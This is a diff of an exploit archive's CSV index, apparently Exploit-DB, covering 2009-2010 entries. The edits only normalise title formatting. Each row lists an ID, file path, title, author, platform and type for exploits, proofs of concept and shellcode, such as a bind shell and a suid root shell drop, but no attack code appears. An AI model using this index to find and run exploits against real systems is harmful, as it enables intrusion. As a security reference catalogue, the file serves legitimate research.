id,file,description,date,author,platform,type,port 9657,platforms/windows/dos/9657.pl,"httpdx Web Server 1.4 (Host Header) Remote Format String DoS Exploit",2009-09-14,"Pankaj Kohli",windows,dos,0 9658,platforms/hardware/remote/9658.txt,"Neufbox NB4-R1.5.10-MAIN Persistent XSS Vulnerability",2009-09-14,"599eme Man",hardware,remote,0 9659,platforms/windows/local/9659.cpp,"Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow PoC",2009-09-14,"fl0 fl0w",windows,local,0 -9660,platforms/windows/remote/9660.pl,"Techlogica HTTP Server 1.03 Arbitrary File Disclosure Exploit",2009-09-14,"ThE g0bL!N",windows,remote,0 +9660,platforms/windows/remote/9660.pl,"Techlogica HTTP Server 1.03 - Arbitrary File Disclosure Exploit",2009-09-14,"ThE g0bL!N",windows,remote,0 9661,platforms/windows/local/9661.c,"MP3 Studio 1.0 - (.m3u) Local Buffer Overflow Exploit",2009-09-14,dmc,windows,local,0 9662,platforms/windows/remote/9662.c,"IPSwitch IMAP Server <= 9.20 - Remote Buffer Overflow Exploit",2009-09-14,dmc,windows,remote,143 9663,platforms/windows/remote/9663.py,"Mozilla Firefox 2.0.0.16 UTF-8 URL Remote Buffer Overflow Exploit",2009-09-14,dmc,windows,remote,0 @@ -9138,9 +9138,9 @@ id,file,description,date,author,platform,type,port 9677,platforms/windows/dos/9677.c,"HERO SUPER PLAYER 3000 - (.m3u) Buffer Overflow PoC",2009-09-15,"fl0 fl0w",windows,dos,0 9680,platforms/windows/local/9680.txt,"Protector Plus Antivirus 8/9 - Local Privilege Escalation Vulnerability",2009-09-15,"Maxim A. Kulakov",windows,local,0 9681,platforms/php/webapps/9681.txt,"efront <= 3.5.4 (database.php path) Remote File Inclusion Vulnerability",2009-09-15,"cr4wl3r ",php,webapps,0 -9682,platforms/windows/dos/9682.txt,"Adobe ShockWave Player 11.5.1.601 ActiveX Buffer Overflow PoC",2009-09-15,"Francis Provencher",windows,dos,0 -9683,platforms/windows/dos/9683.txt,"Novell Groupwise Client 7.0.3.1294 ActiveX Denial of Service PoC",2009-09-15,"Francis Provencher",windows,dos,0 -9684,platforms/windows/dos/9684.txt,"EasyMail Quicksoft 6.0.2.0 ActiveX Remote Code Execution PoC",2009-09-15,"Francis Provencher",windows,dos,0 +9682,platforms/windows/dos/9682.txt,"Adobe ShockWave Player 11.5.1.601 - ActiveX Buffer Overflow PoC",2009-09-15,"Francis Provencher",windows,dos,0 +9683,platforms/windows/dos/9683.txt,"Novell Groupwise Client 7.0.3.1294 - ActiveX Denial of Service PoC",2009-09-15,"Francis Provencher",windows,dos,0 +9684,platforms/windows/dos/9684.txt,"EasyMail Quicksoft 6.0.2.0 - ActiveX Remote Code Execution PoC",2009-09-15,"Francis Provencher",windows,dos,0 9685,platforms/windows/dos/9685.txt,"EasyMail Quicksoft 6.0.2.0 (CreateStore) ActiveX Code Execution PoC",2009-09-15,"Francis Provencher",windows,dos,0 9686,platforms/windows/dos/9686.py,"VLC Media Player < 0.9.6 (CUE) Local Buffer Overflow PoC",2009-09-15,Dr_IDE,windows,dos,0 9687,platforms/windows/local/9687.py,"SAP Player 0.9 - (.pla) Universal Local Buffer Overflow Exploit (SEH)",2009-09-15,mr_me,windows,local,0 @@ -9374,7 +9374,7 @@ id,file,description,date,author,platform,type,port 10004,platforms/multiple/dos/10004.txt,"Dopewars 1.5.12 Server Denial of Service",2009-10-06,"Doug Prostko",multiple,dos,7902 10005,platforms/windows/dos/10005.py,"Windows 7 / Server 2008R2 - Remote Kernel Crash",2009-11-11,"laurent gaffie",windows,dos,445 10006,platforms/php/webapps/10006.txt,"DreamPoll 3.1 Vulnerabilities",2009-10-08,"Mark from infosecstuff",php,webapps,0 -10007,platforms/windows/remote/10007.html,"EasyMail Objects EMSMTP.DLL 6.0.1 ActiveX Control Remote Buffer Overflow Vulnerability",2009-11-12,"Will Dormann",windows,remote,0 +10007,platforms/windows/remote/10007.html,"EasyMail Objects EMSMTP.DLL 6.0.1 - ActiveX Control Remote Buffer Overflow Vulnerability",2009-11-12,"Will Dormann",windows,remote,0 10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing - Multiple Remote Buffer Overflow Vulnerabilities",2009-11-11,"Carsten Eiram",windows,local,0 10010,platforms/windows/local/10010.txt,"Free WMA MP3 Converter 1.1 - (.wav) Local Buffer Overflow",2009-10-09,KriPpLer,windows,local,0 10011,platforms/hardware/remote/10011.txt,"HP LaserJet printers - Multiple Stored XSS Vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80 @@ -9455,7 +9455,7 @@ id,file,description,date,author,platform,type,port 10093,platforms/multiple/remote/10093.txt,"Adobe Shockwave 11.5.1.601 Player Multiple Code Execution Vulnerability",2009-11-04,"Francis Provencher",multiple,remote,0 10094,platforms/jsp/webapps/10094.txt,"IBM Rational RequisitePro 7.10 and ReqWebHelp Multiple Cross-Site Scripting",2009-10-15,IBM,jsp,webapps,0 10095,platforms/multiple/remote/10095.txt,"Samba 3.0.10 - 3.3.5 Format String And Security Bypass Vulnerabilities",2009-11-13,"Jeremy Allison",multiple,remote,0 -10096,platforms/php/webapps/10096.txt,"OS Commerce 2.2r2 authentication bypass",2009-11-13,"Stuart Udall",php,webapps,0 +10096,platforms/php/webapps/10096.txt,"OS Commerce 2.2r2 - authentication bypass",2009-11-13,"Stuart Udall",php,webapps,0 10097,platforms/php/remote/10097.php,"PHP 5.2.11/5.3.0 - Multiple Vulnerabilities",2009-11-13,"Maksymilian Arciemowicz",php,remote,0 10098,platforms/windows/remote/10098.py,"Novell eDirectory 8.8 SP5 - iConsole Buffer Overflow",2009-11-16,ryujin,windows,remote,0 10099,platforms/windows/remote/10099.py,"HP Power Manager Administration - Universal Buffer Overflow Exploit",2009-11-16,ryujin,windows,remote,80 @@ -9644,7 +9644,7 @@ id,file,description,date,author,platform,type,port 10372,platforms/aix/webapps/10372.txt,"OPMANAGER - Blind SQL/XPath injectio",2009-12-10,"Asheesh kumar Mani Tripathi",aix,webapps,0 10373,platforms/windows/local/10373.rb,"Xenorate 2.50 - (.xpl) universal Local Buffer Overflow Exploit (SEH) (meta)",2009-12-10,"loneferret germaya_x",windows,local,0 10374,platforms/windows/local/10374.pl,"Easy RM to MP3 Converter 2.7.3.700",2009-12-10,"Vinod Sharma",windows,local,0 -10375,platforms/windows/remote/10375.html,"SAP GUI for Windows sapirrfc.dll Activex Overflow Exploit",2009-12-10,Abysssec,windows,remote,0 +10375,platforms/windows/remote/10375.html,"SAP GUI for Windows sapirrfc.dll ActiveX Overflow Exploit",2009-12-10,Abysssec,windows,remote,0 10376,platforms/windows/webapps/10376.txt,"Billwerx RC 3.1 - Multiple Vulnerabilities",2009-12-11,mr_me,windows,webapps,80 10377,platforms/windows/dos/10377.txt,"IBM SolidDB - Invalid Error Code Vulnerability",2009-11-18,"Core Security",windows,dos,2315 10378,platforms/php/webapps/10378.txt,"Nuggetz CMS 1.0 - Remote Code Execution",2009-12-10,"Amol Naik",php,webapps,0 @@ -10165,7 +10165,7 @@ id,file,description,date,author,platform,type,port 11065,platforms/windows/dos/11065.html,"SPlayer XvidDecoder 3.3 - ActiveX Remote Exec PoC (0day)",2010-01-08,superli,windows,dos,0 11068,platforms/php/webapps/11068.txt,"Joomla Component com_ksadvertiser SQL Injection Vulnerability",2010-01-08,FL0RiX,php,webapps,0 11069,platforms/php/webapps/11069.txt,"DELTAScripts PHPLinks (catid) SQL Injection Vulnerability",2010-01-08,"Hamza 'MizoZ' N.",php,webapps,0 -11070,platforms/windows/dos/11070.txt,"Windows Live Messenger 2009 ActiveX DoS Vulnerability",2010-01-08,"HACKATTACK IT SECURITY GmbH",windows,dos,0 +11070,platforms/windows/dos/11070.txt,"Windows Live Messenger 2009 - ActiveX DoS Vulnerability",2010-01-08,"HACKATTACK IT SECURITY GmbH",windows,dos,0 11071,platforms/php/webapps/11071.txt,"DELTAScripts PHPClassifieds (rate.php) Blind SQL Injection",2010-01-08,"Hamza 'MizoZ' N.",php,webapps,0 11075,platforms/php/webapps/11075.txt,"ProfitCode Shopping Cart Multiple LFI/RFI Vulnerabilities",2010-01-09,"Zer0 Thunder",php,webapps,0 11076,platforms/php/webapps/11076.txt,"PPVChat Mulitiple Vulnerabilities",2010-01-09,andresg888,php,webapps,0 @@ -10222,7 +10222,7 @@ id,file,description,date,author,platform,type,port 11148,platforms/php/webapps/11148.txt,"PonVFTP Bypass and Shell Upload Vulnerability",2010-01-15,S2K9,php,webapps,0 11149,platforms/windows/dos/11149.c,"Sub Station Alpha 4.08 - (.rt) Local Buffer Overflow PoC",2010-01-15,"fl0 fl0w",windows,dos,0 11150,platforms/windows/dos/11150.txt,"Aqua Real 1.0 & 2.0 - Local Crash PoC",2010-01-15,R3d-D3V!L,windows,dos,0 -11151,platforms/windows/remote/11151.html,"Internet Explorer wshom.ocx ActiveX Control Remote Code Execution",2010-01-16,"germaya_x and D3V!L FUCKER",windows,remote,0 +11151,platforms/windows/remote/11151.html,"Internet Explorer - wshom.ocx ActiveX Control Remote Code Execution",2010-01-16,"germaya_x and D3V!L FUCKER",windows,remote,0 11152,platforms/windows/local/11152.py,"Google SketchUp <= 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,windows,local,0 11154,platforms/windows/local/11154.py,"BS.Player 2.51 - Universal SEH Overflow Exploit",2010-01-16,Dz_attacker,windows,local,0 11155,platforms/php/webapps/11155.txt,"Transload Script Upload Vulnerability",2010-01-16,DigitALL,php,webapps,0 @@ -10256,7 +10256,7 @@ id,file,description,date,author,platform,type,port 11187,platforms/multiple/webapps/11187.txt,"FreePBX 2.5.x - Information Disclosure",2010-01-18,"Ivan Huertas",multiple,webapps,0 11188,platforms/php/webapps/11188.txt,"Fatwiki (fwiki) 1.0 - Remote File Include (RFI)",2010-01-18,kaMtiEz,php,webapps,0 11189,platforms/php/webapps/11189.txt,"Soft Direct 1.05 - Multiple Vulnerabilities",2010-01-18,indoushka,php,webapps,0 -11190,platforms/windows/dos/11190.txt,"AOL 9.5 ActiveX Heap Overflow Vulnerability",2010-01-19,"Hellcode Research",windows,dos,0 +11190,platforms/windows/dos/11190.txt,"AOL 9.5 - ActiveX Heap Overflow Vulnerability",2010-01-19,"Hellcode Research",windows,dos,0 11191,platforms/windows/local/11191.pl,"Millenium MP3 Studio 1.x - (.m3u) Local Stack Overflow",2010-01-19,NeoCortex,windows,local,0 11192,platforms/windows/dos/11192.txt,"OpenOffice - (.slk) File Parsing Null Pointer Vulnerability",2010-01-19,"Hellcode Research",windows,dos,0 11195,platforms/windows/dos/11195.html,"Microsoft Windows Defender ActiveX Heap Overflow PoC",2010-01-19,SarBoT511,windows,dos,0 @@ -10274,7 +10274,7 @@ id,file,description,date,author,platform,type,port 11211,platforms/multiple/webapps/11211.txt,"cPanel HTTP Response Splitting Vulnerability",2010-01-21,Trancer,multiple,webapps,0 11212,platforms/asp/webapps/11212.txt,"eWebeditor Directory Traversal",2010-01-21,N/A,asp,webapps,0 11213,platforms/php/webapps/11213.txt,"Joomla Component com_book SQL Injection Vulnerability",2010-01-21,Evil-Cod3r,php,webapps,0 -11214,platforms/windows/dos/11214.html,"Windows Live Messenger 2009 ActiveX Heap Overflow PoC",2010-01-21,SarBoT511,windows,dos,0 +11214,platforms/windows/dos/11214.html,"Windows Live Messenger 2009 - ActiveX Heap Overflow PoC",2010-01-21,SarBoT511,windows,dos,0 11215,platforms/windows/webapps/11215.txt,"SHOUTcast Server <= 1.9.8/Win32 - CSRF Vulnerability",2010-01-21,"cp77fk4r ",windows,webapps,0 11216,platforms/php/webapps/11216.txt,"Blog System 1.x - (note) SQL Injection Vuln",2010-01-21,"BorN To K!LL",php,webapps,0 11217,platforms/windows/dos/11217.txt,"IntelliTamper 2.07/2.08 (defer)Remote Buffer Overflow PoC",2010-01-21,SkuLL-HackeR,windows,dos,0 @@ -10965,7 +10965,7 @@ id,file,description,date,author,platform,type,port 12027,platforms/windows/dos/12027.py,"DSEmu 0.4.10 - (.nds) Local Crash Exploit",2010-04-03,l3D,windows,dos,0 12028,platforms/php/webapps/12028.txt,"PHP-fusion dsmsf (module downloads) SQL Injection Exploit",2010-04-03,Inj3ct0r,php,webapps,0 12029,platforms/asp/webapps/12029.txt,"SafeSHOP <= 1.5.6 - Cross-Site Scripting & Multiple Cross-Site Request Forgery",2010-04-03,"cp77fk4r ",asp,webapps,0 -12030,platforms/windows/dos/12030.html,"IncrediMail 2.0 ActiveX (Authenticate) bof PoC",2010-04-03,d3b4g,windows,dos,0 +12030,platforms/windows/dos/12030.html,"IncrediMail 2.0 - ActiveX (Authenticate) bof PoC",2010-04-03,d3b4g,windows,dos,0 12031,platforms/php/webapps/12031.html,"Advanced Management For Services Sites Remote Add Admin Exploit",2010-04-03,alnjm33,php,webapps,0 12032,platforms/windows/dos/12032.html,"Microsoft Internet Explorer Tabular Data Control ActiveX Remote Code Execution",2010-04-03,ZSploit.com,windows,dos,0 12033,platforms/multiple/remote/12033.txt,"Java Mini Web Server <= 1.0 Path Traversal and Cross-Site Scripting",2010-04-03,"cp77fk4r ",multiple,remote,0 @@ -11207,7 +11207,7 @@ id,file,description,date,author,platform,type,port 12291,platforms/php/webapps/12291.txt,"Joomla Component iF surfALERT com_if_surfalert Local File Inclusion Vulnerability",2010-04-18,AntiSecurity,php,webapps,0 12292,platforms/php/webapps/12292.txt,"Flex File Manager Shell Upload Vulnerability",2010-04-19,Mr.MLL,php,webapps,0 12293,platforms/windows/local/12293.py,"TweakFS 1.0 (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0 -12294,platforms/windows/dos/12294.txt,"avtech software (avc781viewer.dll) activex Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0 +12294,platforms/windows/dos/12294.txt,"avtech software (avc781viewer.dll) ActiveX Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0 12295,platforms/php/webapps/12295.txt,"N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability",2010-04-19,eidelweiss,php,webapps,0 12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability",2010-04-19,"cr4wl3r ",php,webapps,0 12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c Denial of Service and Modem Reset",2010-04-19,hkm,hardware,dos,0 @@ -11517,7 +11517,7 @@ id,file,description,date,author,platform,type,port 12646,platforms/php/webapps/12646.txt,"B-Hind CMS (tiny_mce) Remote File Upload",2010-05-18,"innrwrld and h00die",php,webapps,0 12647,platforms/php/webapps/12647.txt,"Webloader 7 - 8 (vid) SQL Injection Vulnerability",2010-05-18,ByEge,php,webapps,0 12648,platforms/php/webapps/12648.txt,"Joomla Component com_packages SQL Injection Vulnerability",2010-05-18,"Kernel Security Group",php,webapps,0 -12650,platforms/windows/dos/12650.txt,"Attachmate Reflection Standard Suite 2008 activex Buffer Overflow",2010-05-18,"Rad L. Sneak",windows,dos,0 +12650,platforms/windows/dos/12650.txt,"Attachmate Reflection Standard Suite 2008 - ActiveX Buffer Overflow",2010-05-18,"Rad L. Sneak",windows,dos,0 12651,platforms/php/webapps/12651.txt,"Lokomedia CMS (sukaCMS) Local File Disclosure Vulnerability",2010-05-18,"vir0e5 ",php,webapps,0 12652,platforms/netbsd_x86/dos/12652.sh,"NetBSD 5.0 and below Hack GENOCIDE Environment Overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0 12653,platforms/netbsd_x86/dos/12653.sh,"NetBSD 5.0 and below Hack PATH Environment Overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0 @@ -12139,7 +12139,7 @@ id,file,description,date,author,platform,type,port 13831,platforms/php/webapps/13831.txt,"Full Site for Restaurant SQL Injection Vulnerability",2010-06-11,"L0rd CrusAd3r",php,webapps,0 13832,platforms/php/webapps/13832.txt,"ardeacore 2.2 - Remote File Inclusion Vulnerability",2010-06-11,"cr4wl3r ",php,webapps,0 13833,platforms/php/webapps/13833.txt,"Parallels System Automation (PSA) Local File Inclusion Vulnerability",2010-06-11,"Pouya Daneshmand",php,webapps,0 -13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 ActiveX with DEP bypass",2010-06-11,Lincoln,windows,remote,0 +13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP bypass",2010-06-11,Lincoln,windows,remote,0 13835,platforms/php/webapps/13835.txt,"DaLogin 2.2 (FCKeditor) Remote Arbitrary File Upload Exploit",2010-06-11,eidelweiss,php,webapps,0 13836,platforms/windows/dos/13836.py,"Solarwinds 10.4.0.13 - Denial of Service Exploit",2010-06-12,Nullthreat,windows,dos,0 13837,platforms/windows/dos/13837.pl,"Media Player Classic 1.3.1774.0 - (mpcpl) Local DoS (PoC) (0day)",2010-06-12,R3d-D3V!L,windows,dos,0 @@ -12411,9 +12411,9 @@ id,file,description,date,author,platform,type,port 14171,platforms/php/webapps/14171.txt,"Iphone Pointter Social Network LFI Vulnerablility",2010-07-02,Sid3^effects,php,webapps,0 14172,platforms/php/webapps/14172.txt,"Joomla Seyret Video Component (com_seyret) Blind SQL Injection Exploit",2010-07-02,RoAd_KiLlEr,php,webapps,0 14175,platforms/windows/dos/14175.pl,"Mp3 Digitalbox 2.7.2.0 - (.mp3) Local Stack Overflow PoC",2010-07-02,v3n0m,windows,dos,0 -14176,platforms/php/webapps/14176.c,"iScripts SocialWare 2.2.x Arbitrary File Upload Vulnerability",2010-07-02,"Salvatore Fresta",php,webapps,0 +14176,platforms/php/webapps/14176.c,"iScripts SocialWare 2.2.x - Arbitrary File Upload Vulnerability",2010-07-02,"Salvatore Fresta",php,webapps,0 14177,platforms/linux/webapps/14177.txt,"Xplico 0.5.7 - (add.ctp) Remote XSS Vulnerability",2010-07-02,"Marcos Garcia and Maximiliano Soler",linux,webapps,0 -14179,platforms/windows/remote/14179.txt,"Microsoft Internet Information Services (IIS) 5 Authentication Bypass Vulnerability (MS10-065)",2010-07-02,"Soroush Dalili",windows,remote,0 +14179,platforms/windows/remote/14179.txt,"Microsoft Internet Information Services (IIS) 5 - Authentication Bypass Vulnerability (MS10-065)",2010-07-02,"Soroush Dalili",windows,remote,0 14180,platforms/windows/remote/14180.py,"HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 14181,platforms/windows/remote/14181.py,"HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 14182,platforms/windows/remote/14182.py,"HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 @@ -12447,7 +12447,7 @@ id,file,description,date,author,platform,type,port 14211,platforms/php/webapps/14211.txt,"Joomla NijnaMonials Component (com_ninjamonials) Blind SQL Injection Vulnerability",2010-07-04,Sid3^effects,php,webapps,0 14213,platforms/php/webapps/14213.txt,"Joomla Component Sef (com_sef) - LFI Vulnerability",2010-07-05,_mlk_,php,webapps,0 14214,platforms/php/webapps/14214.txt,"bbPress 1.0.2 - CSRF Change Admin Password",2010-07-05,saudi0hacker,php,webapps,0 -14215,platforms/windows/local/14215.txt,"SasCam 2.7 ActiveX Head Buffer Overflow",2010-07-05,blake,windows,local,0 +14215,platforms/windows/local/14215.txt,"SasCam 2.7 - ActiveX Head Buffer Overflow",2010-07-05,blake,windows,local,0 14216,platforms/linux/shellcode/14216.c,"97 bytes Linx x86 bind shell port 64533",2010-07-05,Magnefikko,linux,shellcode,0 14217,platforms/php/webapps/14217.txt,"WikiWebHelp 0.28 - SQL Injection Vulnerability",2010-07-05,"ADEO Security",php,webapps,0 14218,platforms/linux/shellcode/14218.c,"161 bytes Drop suid shell root in /tmp/.hiddenshell Linux Polymorphic Shellcode",2010-07-05,gunslinger_,linux,shellcode,0 @@ -12496,7 +12496,7 @@ id,file,description,date,author,platform,type,port 14266,platforms/windows/dos/14266.pl,"IrcDelphi Daemon Server Denial of Service",2010-07-08,Crash,windows,dos,6667 14267,platforms/windows/remote/14267.txt,"EA Battlefield 2 and Battlefield 2142 - Multiple Arbitrary File Upload Vulnerabilities",2010-07-08,"Luigi Auriemma",windows,remote,0 14268,platforms/multiple/dos/14268.txt,"Qt 4.6.3 - ""QSslSocketBackendPrivate::transmit()"" Denial of Service",2010-07-08,"Luigi Auriemma",multiple,dos,0 -14269,platforms/windows/remote/14269.html,"FathFTP 1.7 ActiveX Buffer Overflow",2010-07-08,blake,windows,remote,0 +14269,platforms/windows/remote/14269.html,"FathFTP 1.7 - ActiveX Buffer Overflow",2010-07-08,blake,windows,remote,0 14270,platforms/php/webapps/14270.txt,"Zylone IT Multiple Blind SQL Injection Vulnerability",2010-07-08,Callo,php,webapps,0 14271,platforms/php/webapps/14271.txt,"pithcms (theme) Local Remote File inclusion Vulnerability",2010-07-08,eidelweiss,php,webapps,0 14272,platforms/osx/remote/14272.py,"UFO: Alien Invasion 2.2.1 - IRC Client Remote Code Execution - OS X Snow Leopard (ROP)",2010-07-08,d1dn0t,osx,remote,0 @@ -12527,7 +12527,7 @@ id,file,description,date,author,platform,type,port 14305,platforms/linux/shellcode/14305.c,"Linux/x86-64 - execve(""/sbin/iptables"", [""/sbin/iptables"", ""-F""], NULL) - 49 bytes",2010-07-09,10n1z3d,linux,shellcode,0 14306,platforms/php/webapps/14306.txt,"HoloCMS 9.0.47 (news.php) SQL Injection Vulnerability",2010-07-09,GlaDiaT0R,php,webapps,0 14308,platforms/php/webapps/14308.txt,"Wordpress Firestats Remote Configuration File Download",2010-07-09,"Jelmer de Hen",php,webapps,0 -14309,platforms/windows/remote/14309.html,"RSP MP3 Player OCX 3.2 ActiveX Buffer Overflow",2010-07-09,blake,windows,remote,0 +14309,platforms/windows/remote/14309.html,"RSP MP3 Player OCX 3.2 - ActiveX Buffer Overflow",2010-07-09,blake,windows,remote,0 14310,platforms/php/webapps/14310.js,"DotDefender <= 3.8-5 No Authentication Remote Code Execution Through XSS",2010-07-09,rAWjAW,php,webapps,80 14312,platforms/php/webapps/14312.txt,"Joomla redSHOP Component 1.0 (com_redshop pid) - SQL Injection Vulnerability",2010-07-10,v3n0m,php,webapps,0 14313,platforms/php/webapps/14313.txt,"Joomla MyHome Component (com_myhome) Blind SQL Injection Vulnerability",2010-07-10,Sid3^effects,php,webapps,0 @@ -12536,7 +12536,7 @@ id,file,description,date,author,platform,type,port 14318,platforms/php/webapps/14318.html,"Elite CMS 1.01 - Multiple XSS/CSRF Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0 14319,platforms/php/webapps/14319.pl,"PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit",2010-07-10,yawn,php,webapps,0 14320,platforms/php/webapps/14320.pl,"PHP-Nuke <= 8.1.0.3.5b (Your_Account Module) Remote Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,php,webapps,0 -14321,platforms/windows/remote/14321.html,"Image22 ActiveX 1.1.1 - Buffer Overflow Exploit",2010-07-10,blake,windows,remote,0 +14321,platforms/windows/remote/14321.html,"Image22 - ActiveX 1.1.1 - Buffer Overflow Exploit",2010-07-10,blake,windows,remote,0 14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0 14324,platforms/php/webapps/14324.txt,"Sillaj time tracking tool Authentication Bypass",2010-07-10,"L0rd CrusAd3r",php,webapps,0 14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0 @@ -12564,7 +12564,7 @@ id,file,description,date,author,platform,type,port 14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - SEH Exploit (Multiple OS, DEP and ASLR Bypass)",2010-07-13,Node,windows,local,0 14353,platforms/php/webapps/14353.html,"Diferior CMS 8.03 - Multiple CSRF Vulnerabilities",2010-07-13,10n1z3d,php,webapps,0 14354,platforms/php/webapps/14354.txt,"AJ Article Persistent XSS Vulnerability",2010-07-13,Sid3^effects,php,webapps,0 -14355,platforms/windows/webapps/14355.txt,"dotDefender 4.02 Authentication Bypass Vulnerability",2010-07-13,"David K",windows,webapps,0 +14355,platforms/windows/webapps/14355.txt,"dotDefender 4.02 - Authentication Bypass Vulnerability",2010-07-13,"David K",windows,webapps,0 14356,platforms/php/webapps/14356.txt,"CustomCMS Persistent XSS Vulnerability",2010-07-13,Sid3^effects,php,webapps,0 14357,platforms/php/webapps/14357.txt,"2daybiz Businesscard Script Authentication bypass",2010-07-14,D4rk357,php,webapps,0 14359,platforms/php/webapps/14359.html,"Zenphoto CMS 1.3 - Multiple CSRF Vulnerabilities",2010-07-14,10n1z3d,php,webapps,0 @@ -12658,7 +12658,7 @@ id,file,description,date,author,platform,type,port 14454,platforms/php/webapps/14454.txt,"ValidForm Builder script Remote Command Execution Vulnerability",2010-07-23,"HaCkEr arar",php,webapps,0 14455,platforms/php/webapps/14455.txt,"vBulletin(R) 3.8.6 faq.php Information Disclosure Vulnerability",2010-07-24,H-SK33PY,php,webapps,0 14456,platforms/aix/remote/14456.c,"IBM AIX 5l FTPd Remote DES Hash Exploit",2010-07-24,kingcope,aix,remote,0 -14457,platforms/php/webapps/14457.txt,"DM Filemanager 3.9.11 Arbitrary File Upload Vulnerability",2010-07-24,eidelweiss,php,webapps,0 +14457,platforms/php/webapps/14457.txt,"DM Filemanager 3.9.11 - Arbitrary File Upload Vulnerability",2010-07-24,eidelweiss,php,webapps,0 14458,platforms/php/webapps/14458.txt,"sNews (index.php) SQL Injection Vulnerability",2010-07-24,MajoR,php,webapps,0 14459,platforms/php/webapps/14459.txt,"Open Realty 2.x and 3.x Persistent XSS Vulnerability",2010-07-24,K053,php,webapps,0 14461,platforms/asp/webapps/14461.txt,"AKY Blog SQL Injection Vulnerability",2010-07-24,v0calist,asp,webapps,0 @@ -12703,7 +12703,7 @@ id,file,description,date,author,platform,type,port 14517,platforms/windows/dos/14517.pl,"Xion Audio Player 1.0.125 - Denial of Service Vulnerability",2010-07-31,s-dz,windows,dos,0 14518,platforms/php/webapps/14518.txt,"Joomla Component Spielothek 1.6.9 - Multiple Blind SQL Injection",2010-07-31,"Salvatore Fresta",php,webapps,0 14519,platforms/windows/remote/14519.html,"Barcodewiz 3.29 - Barcode ActiveX Control Remote Heap Spray Exploit (IE6/IE7)",2010-07-31,Dr_IDE,windows,remote,0 -14521,platforms/hardware/webapps/14521.txt,"Intellinet IP Camera MNC-L10 Authentication Bypass Vulnerability",2010-08-01,Magnefikko,hardware,webapps,0 +14521,platforms/hardware/webapps/14521.txt,"Intellinet IP Camera MNC-L10 - Authentication Bypass Vulnerability",2010-08-01,Magnefikko,hardware,webapps,0 14522,platforms/windows/remote/14522.rb,"Xerver 4.32 - Source Disclosure and HTTP Authentication Bypass",2010-08-01,"Ben Schmidt",windows,remote,0 14523,platforms/php/webapps/14523.txt,"SnoGrafx (cat.php?cat) SQL Injection Vulnerability",2010-08-02,CoBRa_21,php,webapps,0 14525,platforms/windows/dos/14525.pl,"Jaangle 0.98e.971 - Denial of Service Vulnerability",2010-08-02,s-dz,windows,dos,0 @@ -12742,7 +12742,7 @@ id,file,description,date,author,platform,type,port 14573,platforms/linux/dos/14573.txt,"LibTIFF 'td_stripbytecount' NULL Pointer Dereference Remote Denial of Service Vulnerability",2010-08-07,"Tomas Hoger",linux,dos,0 14576,platforms/windows/local/14576.c,"Mini-stream Ripper 3.1.2.1 - Buffer Overflow (DEP Bypass)",2010-08-07,"fl0 fl0w",windows,local,0 14578,platforms/php/webapps/14578.php,"PHPKick 0.8 - statistics.php SQL Injection Exploit",2010-08-08,garwga,php,webapps,0 -14580,platforms/windows/remote/14580.html,"Advanced File Vault - (eSellerateControl350.dll) Activex Heap Spray (0day)",2010-08-08,"ThE g0bL!N",windows,remote,0 +14580,platforms/windows/remote/14580.html,"Advanced File Vault - (eSellerateControl350.dll) ActiveX Heap Spray (0day)",2010-08-08,"ThE g0bL!N",windows,remote,0 14581,platforms/windows/local/14581.py,"myMP3-Player 3.0 - Buffer Overflow Exploit",2010-08-08,"Oh Yaw Theng",windows,local,0 14582,platforms/windows/dos/14582.pl,"ffdshow Video Codec Denial of Service Vulnerability",2010-08-08,"Nishant Das Patnaik",windows,dos,0 14584,platforms/windows/dos/14584.py,"QQ Computer Manager TSKsp.sys Local Denial of Service Exploit",2010-08-09,"Lufeng Li",windows,dos,0 @@ -12763,7 +12763,7 @@ id,file,description,date,author,platform,type,port 14601,platforms/windows/dos/14601.py,"Rosoft media player 4.4.4 SEH Buffer Overflow PoC",2010-08-10,anonymous,windows,dos,0 14602,platforms/multiple/remote/14602.txt,"Play! Framework <= 1.0.3.1 - Directory Transversal Vulnerability",2010-08-10,kripthor,multiple,remote,0 14604,platforms/windows/remote/14604.py,"Easy FTP - BoF Vulnerabilities in NLST , NLST -al, APPE, RETR , SIZE and XCWD Commands",2010-08-10,"Rabih Mohsen",windows,remote,0 -14605,platforms/windows/remote/14605.html,"RSP MP3 Player OCX ActiveX Buffer Overflow (heap spray)",2010-08-10,Madjix,windows,remote,0 +14605,platforms/windows/remote/14605.html,"RSP MP3 Player - OCX ActiveX Buffer Overflow (heap spray)",2010-08-10,Madjix,windows,remote,0 14606,platforms/multiple/webapps/14606.html,"Zendesk Multiple Vulnerabilities",2010-08-10,"Luis Santana",multiple,webapps,0 14607,platforms/windows/dos/14607.py,"Microsoft SMB Server Trans2 Zero Size Pool Alloc (MS10-054)",2010-08-10,"laurent gaffie",windows,dos,0 14608,platforms/windows/dos/14608.txt,"Microsoft Windows 